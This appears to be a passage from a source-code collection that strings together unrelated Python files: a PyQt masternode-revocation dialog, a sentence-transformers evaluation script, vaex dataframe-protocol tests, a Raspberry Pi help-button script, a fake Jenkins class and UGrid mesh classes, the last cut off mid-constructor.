        # Revocation reason combo box (items populated in retranslateUi).
        self.layReason = QtWidgets.QHBoxLayout()
        self.layReason.setSpacing(8)
        self.layReason.setObjectName("layReason")
        self.cboReason = QtWidgets.QComboBox(self.page0)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.cboReason.sizePolicy().hasHeightForWidth())
        self.cboReason.setSizePolicy(sizePolicy)
        self.cboReason.setObjectName("cboReason")
        self.cboReason.addItem("")
        self.cboReason.addItem("")
        self.cboReason.addItem("")
        self.cboReason.addItem("")
        self.layReason.addWidget(self.cboReason)
        spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.layReason.addItem(spacerItem)
        self.gridLayout.addLayout(self.layReason, 1, 1, 1, 1)
        self.lblIP = QtWidgets.QLabel(self.page0)
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.lblIP.setFont(font)
        self.lblIP.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
        self.lblIP.setObjectName("lblIP")
        self.gridLayout.addWidget(self.lblIP, 1, 0, 1, 1)
        self.stackedWidget.addWidget(self.page0)
        self.verticalLayout.addWidget(self.stackedWidget)
        # Read-only browser showing the equivalent manual commands.
        self.lblManualCommands = QtWidgets.QLabel(RevokeMnDlg)
        self.lblManualCommands.setText("")
        self.lblManualCommands.setObjectName("lblManualCommands")
        self.verticalLayout.addWidget(self.lblManualCommands)
        self.edtManualCommands = QtWidgets.QTextBrowser(RevokeMnDlg)
        self.edtManualCommands.setOpenExternalLinks(True)
        self.edtManualCommands.setOpenLinks(True)
        self.edtManualCommands.setObjectName("edtManualCommands")
        self.verticalLayout.addWidget(self.edtManualCommands)
        # Bottom button row: Cancel | docs link | spacer | Send | Close.
        self.frame = QtWidgets.QFrame(RevokeMnDlg)
        self.frame.setFrameShape(QtWidgets.QFrame.NoFrame)
        self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame.setObjectName("frame")
        self.horizontalLayout = QtWidgets.QHBoxLayout(self.frame)
        self.horizontalLayout.setContentsMargins(12, 12, 12, 12)
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.btnCancel = QtWidgets.QPushButton(self.frame)
        self.btnCancel.setAutoDefault(False)
        self.btnCancel.setObjectName("btnCancel")
        self.horizontalLayout.addWidget(self.btnCancel)
        self.lblDocumentation = QtWidgets.QLabel(self.frame)
        self.lblDocumentation.setText("")
        self.lblDocumentation.setOpenExternalLinks(True)
        self.lblDocumentation.setObjectName("lblDocumentation")
        self.horizontalLayout.addWidget(self.lblDocumentation)
        spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem1)
        self.btnSendRevokeTx = QtWidgets.QPushButton(self.frame)
        self.btnSendRevokeTx.setAutoDefault(False)
        self.btnSendRevokeTx.setObjectName("btnSendRevokeTx")
        self.horizontalLayout.addWidget(self.btnSendRevokeTx)
        self.btnClose = QtWidgets.QPushButton(self.frame)
        self.btnClose.setObjectName("btnClose")
        self.horizontalLayout.addWidget(self.btnClose)
        self.verticalLayout.addWidget(self.frame)
        self.retranslateUi(RevokeMnDlg)
        self.stackedWidget.setCurrentIndex(0)
        QtCore.QMetaObject.connectSlotsByName(RevokeMnDlg)
        RevokeMnDlg.setTabOrder(self.edtManualCommands, self.btnSendRevokeTx)
        RevokeMnDlg.setTabOrder(self.btnSendRevokeTx, self.btnClose)
        RevokeMnDlg.setTabOrder(self.btnClose, self.btnCancel)

    def retranslateUi(self, RevokeMnDlg):
        """Set all user-visible strings (kept separate for Qt translation)."""
        _translate = QtCore.QCoreApplication.translate
        RevokeMnDlg.setWindowTitle(_translate("RevokeMnDlg", "Update masternode registrar"))
        self.lblDescription.setText(_translate("RevokeMnDlg", "This transaction is used by the operator to terminate service or signal the owner that a new BLS key is required (<a href=\"https://docs.dash.org/en/stable/masternodes/maintenance.html#prouprevtx\">details</a>)."))
        self.cboReason.setItemText(0, _translate("RevokeMnDlg", "0: Not Specified"))
        self.cboReason.setItemText(1, _translate("RevokeMnDlg", "1: Termination of Service"))
        self.cboReason.setItemText(2, _translate("RevokeMnDlg", "2: Compromised Keys"))
        self.cboReason.setItemText(3, _translate("RevokeMnDlg", "3: Change of Keys (Not compromised)"))
        self.lblIP.setText(_translate("RevokeMnDlg", "Revocation reason"))
        self.btnCancel.setText(_translate("RevokeMnDlg", "Cancel"))
        self.btnSendRevokeTx.setText(_translate("RevokeMnDlg", "Send Revoke Transaction"))
        self.btnClose.setText(_translate("RevokeMnDlg", "Close"))
# Manual preview: run this module directly to display the dialog standalone.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    RevokeMnDlg = QtWidgets.QDialog()
    ui = Ui_RevokeMnDlg()
    ui.setupUi(RevokeMnDlg)
    RevokeMnDlg.show()
    sys.exit(app.exec_())
|
StarcoderdataPython
|
18995
|
"""
The system RoBERTa trains on the AGB dataset with softmax loss function.
At every 1000 training steps, the model is evaluated on the AGB dev set.
"""
from torch.utils.data import DataLoader
from sentence_transformers import models, losses
from sentence_transformers import SentencesDataset, LoggingHandler, SentenceTransformer
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator, LabelGenerationEvaluator
from sentence_transformers.readers import *
import logging
import torch
import os
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S',
                    level=logging.INFO,
                    handlers=[LoggingHandler()])
#### /print debug information to stdout

# Walk every consecutive ("og_{i}") model checkpoint of every run and
# regenerate its prediction CSVs on the AGB test set.
root_dir = "/data/salmasian/sentence_transformers"
batch_size = 24  # loop-invariant; hoisted out of the per-model loop

for i in range(1, 6):
    run_dir = os.path.join(root_dir, f"run{i}")
    for model_dir in sorted(os.listdir(run_dir)):
        curr_dir = os.path.join(run_dir, model_dir)
        # skip non-consecutive models
        if f"og_{i}" not in curr_dir:
            continue
        print(f"Working on model {model_dir}")

        # Delete stale evaluation output so this run starts fresh.
        # (Fix: reuse the paths computed above instead of rebuilding the
        # same os.path.join expressions a second time.)
        labels_file = os.path.join(curr_dir, "prediction_labels.csv")
        pred_file = os.path.join(curr_dir, "prediction_results.csv")
        if os.path.isfile(labels_file):
            os.remove(labels_file)
        if os.path.isfile(pred_file):
            os.remove(pred_file)

        # Load the saved encoder plus its trained softmax classification head.
        model_save_path = curr_dir
        agb_reader = TestAGBReader('datasets/og-test')
        train_num_labels = agb_reader.get_num_labels()
        model = SentenceTransformer(model_save_path, device="cuda:0")
        train_loss = losses.SoftmaxLoss(model=model,
                                        sentence_embedding_dimension=model.get_sentence_embedding_dimension(),
                                        num_labels=train_num_labels)
        train_loss.classifier = torch.load(os.path.join(model_save_path, "2_Softmax/pytorch_model.bin"))
        print("test")

        test_dir = "/data/daumiller/sentence-transformers/examples/datasets/og-test"
        for fn in sorted(os.listdir(test_dir)):
            examples = agb_reader.get_examples(fn)
            if not examples:
                continue
            # Hack to avoid problems with docs almost as long as batch size
            batch_size_used = batch_size - 3 if len(examples) == batch_size + 1 else batch_size
            test_data = SentencesDataset(examples=examples, model=model, shorten=True)
            test_dataloader = DataLoader(test_data, shuffle=False, batch_size=batch_size_used)
            evaluator = LabelGenerationEvaluator(test_dataloader, softmax_model=train_loss)
            model.evaluate(evaluator, model_save_path)
|
StarcoderdataPython
|
1703950
|
<reponame>audacious-software/Simple-Messaging-Dialog-Engine-Support
def quicksilver_tasks():
    """Return the Quicksilver schedule as (command, flags, interval-minutes) triples."""
    send_pending = ('simple_messaging_send_pending_messages', '--no-color', 5)
    nudge_sessions = ('nudge_active_sessions', '--no-color', 10)
    return [send_pending, nudge_sessions]
|
StarcoderdataPython
|
3271451
|
<gh_stars>0
from pyjenkins.job import Job, JobStatus
class Jenkins(object):
    """In-memory fake Jenkins server that cycles through canned job listings."""

    def __init__(self):
        # Successive calls to list_jobs() rotate through these snapshots.
        self._jobs_rota = [[Job('spam', JobStatus.OK),
                            Job('eggs', JobStatus.OK)],
                           [Job('spam', JobStatus.FAILING),
                            Job('eggs', JobStatus.DISABLED)],
                           ]
        self._next_jobs = 0

    def list_jobs(self):
        """Return the current jobs snapshot and advance the rotation.

        @rtype: list of Job
        """
        result = self._jobs_rota[self._next_jobs]
        # Fix: the original compared ints with ``is`` (identity), which only
        # works by accident for small CPython ints; use modular arithmetic.
        self._next_jobs = (self._next_jobs + 1) % len(self._jobs_rota)
        return result

    def enable_job(self, job_name):
        """Set ``job_name`` to OK; return True iff the job exists.

        Fix: previously returned True even when the job was not found.
        """
        job = self._find_job(job_name)
        if job:
            job.status = JobStatus.OK
        return job is not None

    def disable_job(self, job_name):
        """Set ``job_name`` to DISABLED; return True iff the job exists.

        Fix: previously always returned False, even on success.
        """
        job = self._find_job(job_name)
        if job:
            job.status = JobStatus.DISABLED
        return job is not None

    def _find_job(self, job_name):
        # Search only the *current* snapshot; None if absent.
        for job in self._jobs_rota[self._next_jobs]:
            if job.name == job_name:
                return job
        return None
StarcoderdataPython
|
85922
|
<reponame>sethvargo/vaex
import numpy as np
import pyarrow as pa
import pytest
from typing import Any, Optional, Tuple, Dict, Iterable, Sequence
DataFrameObject = Any
ColumnObject = Any
import vaex
from common import *
from vaex.dataframe_protocol import _from_dataframe_to_vaex, _DtypeKind, _VaexBuffer, _VaexColumn, _VaexDataFrame
def test_float_only(df_factory):
    """Round-trip a float-only dataframe through the interchange protocol."""
    df = df_factory(x=[1.5, 2.5, 3.5], y=[9.2, 10.5, 11.8])
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    for name in ("x", "y"):
        assert df2[name].tolist() == df[name].tolist()
        assert df2.__dataframe__().get_column_by_name(name).null_count == 0
    assert_dataframe_equal(df.__dataframe__(), df)
def test_mixed_intfloat(df_factory):
    """Round-trip a mixed int/float dataframe through the interchange protocol."""
    df = df_factory(x=[1, 2, 0], y=[9.2, 10.5, 11.8])
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    for name in ("x", "y"):
        assert df2[name].tolist() == df[name].tolist()
        assert df2.__dataframe__().get_column_by_name(name).null_count == 0
    assert_dataframe_equal(df.__dataframe__(), df)
def test_mixed_intfloatbool(df_factory):
    """Round-trip bool/int/float columns and spot-check _VaexColumn internals."""
    df = df_factory(x=np.array([True, True, False]), y=np.array([1, 2, 0]), z=np.array([9.2, 10.5, 11.8]))
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    for name in ("x", "y", "z"):
        assert df2[name].tolist() == df[name].tolist()
        assert df2.__dataframe__().get_column_by_name(name).null_count == 0
    # Additional checks on the _VaexColumn implementation.
    col_x = df2.__dataframe__().get_column_by_name("x")
    assert col_x._allow_copy == True
    assert col_x.size == 3
    assert col_x.offset == 0
    col_z = df2.__dataframe__().get_column_by_name("z")
    assert col_z.dtype[0] == 2  # 2: float64
    assert col_z.dtype[1] == 64  # 64: float64
    assert col_z.dtype == (2, 64, "<f8", "=")
    with pytest.raises(TypeError):
        assert df2.__dataframe__().get_column_by_name("y").describe_categorical
    # Arrow-backed columns report bitmask nulls; numpy-backed report none.
    expected_null = (3, 0) if df2['y'].dtype.is_arrow else (0, None)
    assert df2.__dataframe__().get_column_by_name("y").describe_null == expected_null
    assert_dataframe_equal(df.__dataframe__(), df)
def test_mixed_missing(df_factory_arrow):
    """Round-trip columns containing missing values; nulls must be counted,
    values preserved, and the result must not be a masked column."""
    source = df_factory_arrow(
        x=np.array([True, None, False, None, True]),
        y=np.array([None, 2, 0, 1, 2]),
        z=np.array([9.2, 10.5, None, 11.8, None]),
    )
    result = _from_dataframe_to_vaex(source.__dataframe__())
    assert source.__dataframe__().metadata == result.__dataframe__().metadata
    for name, expected_nulls in (("x", 2), ("y", 1), ("z", 2)):
        assert source[name].tolist() == result[name].tolist()
        assert not result[name].is_masked
        assert result.__dataframe__().get_column_by_name(name).null_count == expected_nulls
        assert source[name].dtype == result[name].dtype
    assert_dataframe_equal(source.__dataframe__(), source)
def test_missing_from_masked(df_factory_numpy):
    """Masked numpy input round-trips to unmasked data with the mask
    reported through the interchange protocol as nulls."""
    source = df_factory_numpy(
        x=np.ma.array([1, 2, 3, 4, 0], mask=[0, 0, 0, 1, 1], dtype=int),
        y=np.ma.array([1.5, 2.5, 3.5, 4.5, 0], mask=[False, True, True, True, False], dtype=float),
        z=np.ma.array([True, False, True, True, True], mask=[1, 0, 0, 1, 0], dtype=bool),
    )
    result = _from_dataframe_to_vaex(source.__dataframe__())
    assert source.__dataframe__().metadata == result.__dataframe__().metadata
    for name, expected_nulls in (("x", 2), ("y", 3), ("z", 2)):
        assert source[name].tolist() == result[name].tolist()
        assert not result[name].is_masked
        assert result.__dataframe__().get_column_by_name(name).null_count == expected_nulls
        assert source[name].dtype == result[name].dtype
    assert_dataframe_equal(source.__dataframe__(), source)
def test_categorical():
    """Categorized vaex columns are exposed as CATEGORICAL through the
    interchange protocol and round-trip back to their labels."""
    df = vaex.from_arrays(year=[2012, 2013, 2015, 2019], weekday=[0, 1, 4, 6])
    df = df.categorize("year", min_value=2012, max_value=2019)
    df = df.categorize("weekday", labels=["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"])
    # Detailed checks for dtype and null handling of both categoricals.
    year_col = df.__dataframe__().get_column_by_name("year")
    assert year_col.dtype[0] == _DtypeKind.CATEGORICAL
    assert year_col.describe_categorical == (False, True, {0: 2012, 1: 2013, 2: 2014, 3: 2015, 4: 2016, 5: 2017, 6: 2018, 7: 2019})
    assert year_col.describe_null == (0, None)
    assert year_col.dtype == (23, 64, "u", "=")
    weekday_col = df.__dataframe__().get_column_by_name("weekday")
    assert weekday_col.dtype[0] == _DtypeKind.CATEGORICAL
    assert weekday_col.describe_categorical == (False, True, {0: "Mon", 1: "Tue", 2: "Wed", 3: "Thu", 4: "Fri", 5: "Sat", 6: "Sun"})
    assert weekday_col.describe_null == (0, None)
    assert weekday_col.dtype == (23, 64, "u", "=")
    roundtrip = _from_dataframe_to_vaex(df.__dataframe__())
    assert roundtrip["year"].tolist() == [2012, 2013, 2015, 2019]
    assert roundtrip["weekday"].tolist() == ["Mon", "Tue", "Fri", "Sun"]
    assert_dataframe_equal(df.__dataframe__(), df)
def test_arrow_dictionary():
    """An arrow dictionary array maps onto the CATEGORICAL interchange dtype."""
    codes = pa.array([0, 1, 0, 1, 2, 0, 1, 2])
    labels = pa.array(["foo", "bar", "baz"])
    df = vaex.from_arrays(x=pa.DictionaryArray.from_arrays(codes, labels))
    # Detailed checks for dtype and null handling.
    col = df.__dataframe__().get_column_by_name("x")
    assert col.dtype[0] == _DtypeKind.CATEGORICAL
    assert col.describe_categorical == (False, True, {0: "foo", 1: "bar", 2: "baz"})
    # The null representation depends on the backing storage of the column.
    expected_null = (3, 0) if df['x'].dtype.is_arrow else (0, None)
    assert col.describe_null == expected_null
    assert col.dtype == (23, 64, "u", "=")
    roundtrip = _from_dataframe_to_vaex(df.__dataframe__())
    assert roundtrip.x.tolist() == df.x.tolist()
    assert roundtrip.__dataframe__().get_column_by_name("x").null_count == 0
    assert_dataframe_equal(df.__dataframe__(), df)
def test_arrow_dictionary_missing():
    """Dictionary arrays with masked indices keep their nulls across the round trip."""
    codes = pa.array([0, 1, 2, 0, 1], mask=np.array([0, 1, 1, 0, 0], dtype=bool))
    labels = pa.array(["aap", "noot", "mies"])
    df = vaex.from_arrays(x=pa.DictionaryArray.from_arrays(codes, labels))
    # Detailed checks for dtype and null handling.
    col = df.__dataframe__().get_column_by_name("x")
    assert col.dtype[0] == _DtypeKind.CATEGORICAL
    assert col.describe_categorical == (False, True, {0: "aap", 1: "noot", 2: "mies"})
    roundtrip = _from_dataframe_to_vaex(df.__dataframe__())
    assert roundtrip.x.tolist() == df.x.tolist()
    assert roundtrip.__dataframe__().get_column_by_name("x").null_count == 2
    assert df["x"].dtype.index_type == roundtrip["x"].dtype.index_type
    assert_dataframe_equal(df.__dataframe__(), df)
def test_string():
    """String columns expose the STRING dtype and count None entries as
    nulls, both for the full frame and for a slice of it."""
    df = vaex.from_dict({"A": ["a", None, "cdef", "", "g"]})
    col = df.__dataframe__().get_column_by_name("A")
    assert col._col.tolist() == df.A.tolist()
    # The same invariants must hold on the full frame and on a slice.
    for frame, expected_size in ((df, 5), (df[1:], 4)):
        col = frame.__dataframe__().get_column_by_name("A")
        assert col.size == expected_size
        assert col.null_count == 1
        assert col.dtype[0] == _DtypeKind.STRING
        assert col.describe_null == (3, 0)
        roundtrip = _from_dataframe_to_vaex(frame.__dataframe__())
        assert roundtrip.A.tolist() == frame.A.tolist()
        rt_col = roundtrip.__dataframe__().get_column_by_name("A")
        assert rt_col.null_count == 1
        assert rt_col.describe_null == (3, 0)
        assert rt_col.dtype[0] == _DtypeKind.STRING
def test_no_mem_copy():
    """Verify the interchange conversion shares buffers rather than copying.

    Builds an arrow large_utf8 array directly from raw offset/data buffers,
    converts the frame, then mutates the original buffers and checks the
    mutation is visible in the converted frame too (i.e. zero-copy).
    """
    strings = ["a", "", "cdef", "", "g"]
    # data for above string array
    dbuf = np.array([ 97, 99, 100, 101, 102, 103], dtype='uint8')  # utf-8 payload bytes
    obuf = np.array([0, 1, 1, 5, 5, 6], dtype='int64')  # per-string offsets into dbuf
    length = 5
    buffers = [None, pa.py_buffer(obuf), pa.py_buffer(dbuf)]
    s = pa.Array.from_buffers(pa.large_utf8(), length, buffers)
    x = np.arange(0, 5)
    df = vaex.from_arrays(x=x, s=s)
    df2 = _from_dataframe_to_vaex(df.__dataframe__())
    # primitive data: mutating the source numpy array shows up in df2
    x[0] = 999
    assert df2.x.tolist() == [999, 1, 2, 3, 4]
    # strings
    assert df.s.tolist() == strings
    assert df2.s.tolist() == strings
    # mutate the buffer data (which actually arrow and vaex both don't support/want)
    strings[0] = "b"
    dbuf[0] += 1
    assert df.s.tolist() == strings
    assert df2.s.tolist() == strings
def test_object():
    """Object-dtype columns are rejected: dtype and describe_null both raise."""
    df = vaex.from_arrays(x=np.array([None, True, False]))
    col = df.__dataframe__().get_column_by_name("x")
    assert col._col.tolist() == df.x.tolist()
    assert col.size == 3
    for attribute in ("dtype", "describe_null"):
        with pytest.raises(ValueError):
            getattr(col, attribute)
def test_virtual_column():
    """Virtual (expression) columns survive the interchange round trip."""
    df = vaex.from_arrays(x=np.array([True, True, False]), y=np.array([1, 2, 0]), z=np.array([9.2, 10.5, 11.8]))
    df.add_virtual_column("r", "sqrt(y**2 + z**2)")
    roundtrip = _from_dataframe_to_vaex(df.__dataframe__())
    assert roundtrip.r.tolist() == df.r.tolist()
def test_VaexBuffer():
    """_VaexBuffer reports size, pointer, device and repr, and refuses __dlpack__."""
    data = np.ndarray(shape=(5,), dtype=float, order="F")
    buffer = _VaexBuffer(data)
    expected_ptr = data.__array_interface__["data"][0]
    assert buffer.bufsize == 5 * data.itemsize
    assert buffer.ptr == expected_ptr
    assert buffer.__dlpack_device__() == (1, None)
    assert buffer.__repr__() == f"VaexBuffer({{'bufsize': {5*data.itemsize}, 'ptr': {expected_ptr}, 'device': 'CPU'}})"
    with pytest.raises(NotImplementedError):
        assert buffer.__dlpack__()
def test_VaexDataFrame():
    """Smoke-test the _VaexDataFrame wrapper: shape, column access, selection."""
    df = vaex.from_arrays(x=np.array([True, True, False]), y=np.array([1, 2, 0]), z=np.array([9.2, 10.5, 11.8]))
    dfo = df.__dataframe__()
    assert dfo._allow_copy == True
    assert (dfo.num_columns(), dfo.num_rows(), dfo.num_chunks()) == (3, 3, 1)
    assert dfo.column_names() == ["x", "y", "z"]
    assert dfo.get_column(0)._col.tolist() == df.x.tolist()
    assert dfo.get_column_by_name("y")._col.tolist() == df.y.tolist()
    for col in dfo.get_columns():
        assert col._col.tolist() == df[col._col.expression].tolist()
    # Selecting by position and by name must yield identical data.
    by_index = dfo.select_columns((0, 2))
    by_name = dfo.select_columns_by_name(("x", "z"))
    for position in (0, 1):
        assert by_index._df[:, position].tolist() == by_name._df[:, position].tolist()
def test_chunks(df_factory):
    """get_chunks(3) splits 10 rows into chunks of 4, 4 and 2, then stops."""
    df = df_factory(x=np.arange(10))
    chunk_iter = iter(df.__dataframe__().get_chunks(3))
    for expected_rows in (4, 4, 2):
        assert next(chunk_iter).num_rows() == expected_rows
    with pytest.raises(StopIteration):
        next(chunk_iter)
def assert_buffer_equal(buffer_dtype: Tuple[_VaexBuffer, Any], vaexcol: vaex.expression.Expression):
    """Check an interchange (buffer, dtype) pair against the vaex expression it wraps."""
    buf, dtype = buffer_dtype
    pytest.raises(NotImplementedError, buf.__dlpack__)
    assert buf.__dlpack_device__() == (1, None)
    assert dtype[1] == vaexcol.dtype.index_type.numpy.itemsize * 8
    # Dictionary-encoded arrow columns expose the dtype of their index values.
    is_dictionary = not isinstance(vaexcol.values, np.ndarray) and isinstance(vaexcol.values.type, pa.DictionaryType)
    expected_str = vaexcol.index_values().dtype.numpy.str if is_dictionary else vaexcol.dtype.numpy.str
    assert dtype[2] == expected_str
def assert_column_equal(col: _VaexColumn, vaexcol: vaex.expression.Expression):
    """Assert that interchange column ``col`` matches the vaex expression ``vaexcol``.

    Checks size, offset and null count, then delegates the buffer/dtype
    comparison to ``assert_buffer_equal``.
    """
    assert col.size == vaexcol.df.count("*")
    assert col.offset == 0
    assert col.null_count == vaexcol.countmissing()
    assert_buffer_equal(col._get_data_buffer(), vaexcol)
def assert_dataframe_equal(dfo: DataFrameObject, df: vaex.dataframe.DataFrame):
    """Assert that interchange dataframe ``dfo`` mirrors the vaex dataframe ``df``.

    Compares column count, row count and column names, then checks every
    column via ``assert_column_equal``.
    """
    assert dfo.num_columns() == len(df.columns)
    assert dfo.num_rows() == len(df)
    assert dfo.column_names() == list(df.get_column_names())
    for col in df.get_column_names():
        assert_column_equal(dfo.get_column_by_name(col), df[col])
|
StarcoderdataPython
|
3269546
|
<filename>devices/help_button/help_button.py
# -*- coding: utf-8 -*-
# Raspberry Pi "help button": toggles a call on/off via CallClient when a
# push button is pressed, mirroring the state on a red LED.
import RPi.GPIO as GPIO
from time import sleep
from call_client import CallClient

# BCM pin numbers for the status LED and the momentary push button.
RED_LED_GPIO = 4
RED_TACT_GPIO = 17

GPIO.setmode(GPIO.BCM)
GPIO.setup(RED_LED_GPIO, GPIO.OUT)
# Pull-down resistor: the input reads LOW until the button is pressed.
GPIO.setup(RED_TACT_GPIO, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)

is_called = False  # current toggle state: True while a call is active
call_client = CallClient()

try:
    print('--- start program ---')
    while True:
        if GPIO.input(RED_TACT_GPIO) == GPIO.HIGH:
            if not is_called:
                # Button pressed while idle: light the LED and start a call.
                is_called = True
                print("red switch on")
                GPIO.output(RED_LED_GPIO, GPIO.HIGH)
                token = call_client.get_token()
                call_client.call(token)
            else:
                # Button pressed while active: turn the LED off and cancel.
                is_called = False
                print("red switch off")
                GPIO.output(RED_LED_GPIO, GPIO.LOW)
                token = call_client.get_token()
                call_client.call(token, True)
                # NOTE(review): only this branch waits 2s; a press held in the
                # "on" branch can re-trigger after the 10 ms poll below and
                # immediately toggle back off — confirm this asymmetric
                # debounce is intentional.
                sleep(2)
        sleep(0.01)  # poll the button at ~100 Hz
except KeyboardInterrupt:
    pass
finally:
    # Always leave the LED off and release the GPIO pins on exit.
    GPIO.output(RED_LED_GPIO, GPIO.LOW)
    GPIO.cleanup()
    print('--- stop program ---')
|
StarcoderdataPython
|
1746806
|
<reponame>jearistiz/guane-intern-fastapi<gh_stars>10-100
from app.config import sttgs
from app.utils.http_request import post_to_uri
def test_post_to_uri():
task_complexity = 0
task_query_url = (
sttgs.get('GUANE_WORKER_URI') + f'?task_complexity={task_complexity}'
)
response = post_to_uri(
task_query_url,
message={'task_complexity': task_complexity}
)
assert response.status_code == 201
assert response.json()['status']
|
StarcoderdataPython
|
3362651
|
from __future__ import annotations
from numpy import array, ndarray
class UGridNetwork1D:
    """Network1D data used to define/put/inquire/get a UGrid 1D network.

    Attributes:
        name (str): The network name.
        node_x (ndarray): The x-coordinates of the network nodes.
        node_y (ndarray): The y-coordinates of the network nodes.
        edge_node (ndarray): The nodes defining each branch.
        edge_length (ndarray): The edge lengths.
        geometry_nodes_x (ndarray): The geometry nodes x coordinates.
        geometry_nodes_y (ndarray): The geometry nodes y coordinates.
        num_edge_geometry_nodes (ndarray): The number of geometry nodes on each branch.
        edge_order (ndarray): The order of the branches.
        node_id (list): The node name ids.
        node_long_name (list): The node long names.
        edge_id (list): The names of the branches.
        edge_long_name (list): The long names of the branches.
        is_spherical (bool): True if coordinates are in a spherical system.
        start_index (int): The start index used in connectivity arrays.
    """

    def __init__(
        self,
        name,
        node_x,
        node_y,
        edge_node,
        edge_length,
        geometry_nodes_x,
        geometry_nodes_y,
        num_edge_geometry_nodes,
        edge_order=None,
        node_id=None,
        node_name_long=None,
        edge_id=None,
        edge_long_name=None,
    ):
        # None sentinels replace the previous mutable defaults ([] / array([])),
        # which were shared between all instances created with the defaults.
        self.name: str = name
        self.node_x: ndarray = node_x
        self.node_y: ndarray = node_y
        self.node_id: list = [] if node_id is None else node_id
        self.node_long_name: list = [] if node_name_long is None else node_name_long
        self.edge_node: ndarray = edge_node
        self.edge_length: ndarray = edge_length
        self.edge_order: ndarray = array([]) if edge_order is None else edge_order
        self.edge_id: list = [] if edge_id is None else edge_id
        self.edge_long_name: list = [] if edge_long_name is None else edge_long_name
        self.geometry_nodes_x: ndarray = geometry_nodes_x
        self.geometry_nodes_y: ndarray = geometry_nodes_y
        self.num_edge_geometry_nodes = num_edge_geometry_nodes
        self.is_spherical: bool = False
        self.start_index: int = 0
class UGridMesh1D:
    """Mesh1D data used to define/put/inquire/get a UGrid 1D mesh.

    Attributes:
        name (str): The mesh name.
        network_name (str): The name of the network the mesh lies on.
        node_x (ndarray): The node x coordinates.
        node_y (ndarray): The node y coordinates.
        edge_node (ndarray): The edge node connectivity.
        node_edge_id (ndarray): The network edge id where every node lies.
        node_edge_offset (ndarray): The offset of each node on the network edge.
        node_name_id (list): A list of node name ids.
        node_name_long (list): A list of node long names.
        edge_edge_id (ndarray): The network edge id where every edge lies.
        edge_edge_offset (ndarray): The offset of each edge on the network edge.
        edge_x (ndarray): The edge x coordinates.
        edge_y (ndarray): The edge y coordinates.
        double_fill_value (float): The fill value for arrays of doubles.
        int_fill_value (int): The fill value for arrays of integers.
    """

    def __init__(
        self,
        name,
        network_name,
        node_edge_id,
        node_edge_offset,
        node_x=None,
        node_y=None,
        edge_node=None,
        edge_edge_id=None,
        edge_edge_offset=None,
        edge_x=None,
        edge_y=None,
        node_name_id=None,
        node_name_long=None,
        double_fill_value=-999.0,
        int_fill_value=-999,
    ):
        # None sentinels replace the previous mutable defaults ([] / array([])),
        # which were shared between all instances created with the defaults.
        self.name: str = name
        self.network_name: str = network_name
        self.node_x: ndarray = array([]) if node_x is None else node_x
        self.node_y: ndarray = array([]) if node_y is None else node_y
        self.edge_node: ndarray = array([]) if edge_node is None else edge_node
        self.node_edge_id: ndarray = node_edge_id
        self.node_edge_offset: ndarray = node_edge_offset
        self.node_name_id: list = [] if node_name_id is None else node_name_id
        self.node_name_long: list = [] if node_name_long is None else node_name_long
        self.edge_edge_id: ndarray = array([]) if edge_edge_id is None else edge_edge_id
        self.edge_edge_offset: ndarray = array([]) if edge_edge_offset is None else edge_edge_offset
        self.edge_x: ndarray = array([]) if edge_x is None else edge_x
        self.edge_y: ndarray = array([]) if edge_y is None else edge_y
        self.is_spherical: bool = False
        self.start_index: int = 0
        self.double_fill_value: float = double_fill_value
        self.int_fill_value: int = int_fill_value
class UGridMesh2D:
    """Mesh2D data used to define/put/inquire/get a UGrid 2D mesh.

    Attributes:
        name (str): The mesh name.
        edge_node (ndarray): The nodes composing each mesh 2d edge.
        face_node (ndarray): The nodes composing each mesh 2d face.
        node_x (ndarray): The x-coordinates of the nodes.
        node_y (ndarray): The y-coordinates of the nodes.
        edge_x (ndarray): The x-coordinates of the mesh edges' middle points.
        edge_y (ndarray): The y-coordinates of the mesh edges' middle points.
        face_x (ndarray): The x-coordinates of the mesh faces' mass centers.
        face_y (ndarray): The y-coordinates of the mesh faces' mass centers.
        edge_face (ndarray): The faces on either side of each edge.
        face_edge (ndarray): For each face, the edges composing it.
        face_face (ndarray): For each face, the neighboring faces.
        node_z (ndarray): The node z coordinates.
        edge_z (ndarray): The edge z coordinates.
        face_z (ndarray): The face z coordinates.
        layer_zs (ndarray): The z coordinates of a layer.
        interface_zs (ndarray): The z coordinates of a layer interface.
        boundary_node_connectivity (ndarray): To be detailed.
        volume_coordinates (ndarray): To be detailed.
        start_index (int): The start index used in connectivity arrays.
        num_face_nodes_max (int): The maximum number of face nodes.
        is_spherical (int): 1 if coordinates are in a spherical system, 0 otherwise.
        double_fill_value (float): The fill value for arrays of doubles.
        int_fill_value (int): The fill value for arrays of integers.
    """

    def __init__(
        self,
        name,
        node_x,
        node_y,
        edge_node,
        face_node=None,
        edge_x=None,
        edge_y=None,
        face_x=None,
        face_y=None,
        edge_face=None,
        face_edge=None,
        face_face=None,
        node_z=None,
        edge_z=None,
        face_z=None,
        layer_zs=None,
        interface_zs=None,
        boundary_node_connectivity=None,
        volume_coordinates=None,
        start_index=0,
        num_face_nodes_max=4,
        is_spherical=False,
        double_fill_value=-999.0,
        int_fill_value=-999,
    ):
        # _fresh replaces the previous `array([])` defaults, which were single
        # shared ndarray objects reused by every instance built with defaults.
